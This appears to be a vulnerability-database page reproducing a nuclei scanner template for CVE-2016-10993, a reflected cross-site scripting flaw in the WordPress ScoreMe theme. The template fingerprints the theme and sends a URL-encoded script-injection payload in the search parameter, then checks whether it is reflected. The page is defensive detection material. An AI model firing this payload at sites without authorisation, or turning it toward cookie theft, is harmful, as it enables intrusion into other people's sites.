Lucene search
K

ScoreMe Theme - Cross-Site Scripting

🗓️ 13 Jun 2026 13:20:29Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 30 Views

ScoreMe Theme XSS vulnerability allows attacker to execute arbitrary script in victim's browse

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNVD
WordPress ScoreMe theme cross-site scripting vulnerability
23 Sep 201900:00
cnvd
CVE
CVE-2016-10993
17 Sep 201914:37
cve
Cvelist
CVE-2016-10993
17 Sep 201914:37
cvelist
EUVD
EUVD-2016-1984
7 Oct 202500:30
euvd
NVD
CVE-2016-10993
17 Sep 201915:15
nvd
OSV
CVE-2016-10993
17 Sep 201915:15
osv
Prion
Design/Logic Flaw
17 Sep 201915:15
prion
RedhatCVE
CVE-2016-10993
22 May 202503:48
redhatcve
WPVulnDB
ScoreMe Theme - Unauthenticated Reflected Cross-Site Scripting (XSS)
4 Apr 201600:00
wpvulndb
id: CVE-2016-10993

info:
  name: ScoreMe Theme - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: |
    WordPress ScoreMe theme through 2016-04-01 contains a reflected cross-site scripting vulnerability via the s parameter which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://www.vulnerability-lab.com/get_content.php?id=1808
    - https://wpvulndb.com/vulnerabilities/8431
    - https://nvd.nist.gov/vuln/detail/CVE-2016-10993
    - https://github.com/0xkucing/CVE-2016-10993
    - https://github.com/ARPSyndicate/cvemon
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patch or update to the ScoreMe Theme to fix the XSS vulnerability.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2016-10993
    cwe-id: CWE-79
    cpe: cpe:2.3:a:scoreme_project:scoreme:*:*:*:*:*:wordpress:*:*
    epss-score: 0.01842
    epss-percentile: 0.83437
  metadata:
    framework: wordpress
    max-request: 2
    vendor: "scoreme_project"
    product: scoreme
  tags: cve2016,cve,wordpress,wp-theme,xss,scoreme_project,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - '/wp-content/themes/scoreme/style'

  - method: GET
    path:
      - "{{BaseURL}}/?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210098b7f3039f89afd5f3ea8aaddb089cd1b0343eb4762785ccce95bcc6cb6e60760221008459c7fc20f5c9096c259dc24abe7fb2cc60998cbec24ef26def518fcfb47c93:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 23.5
CVSS 3.15.4
EPSS0.01842
30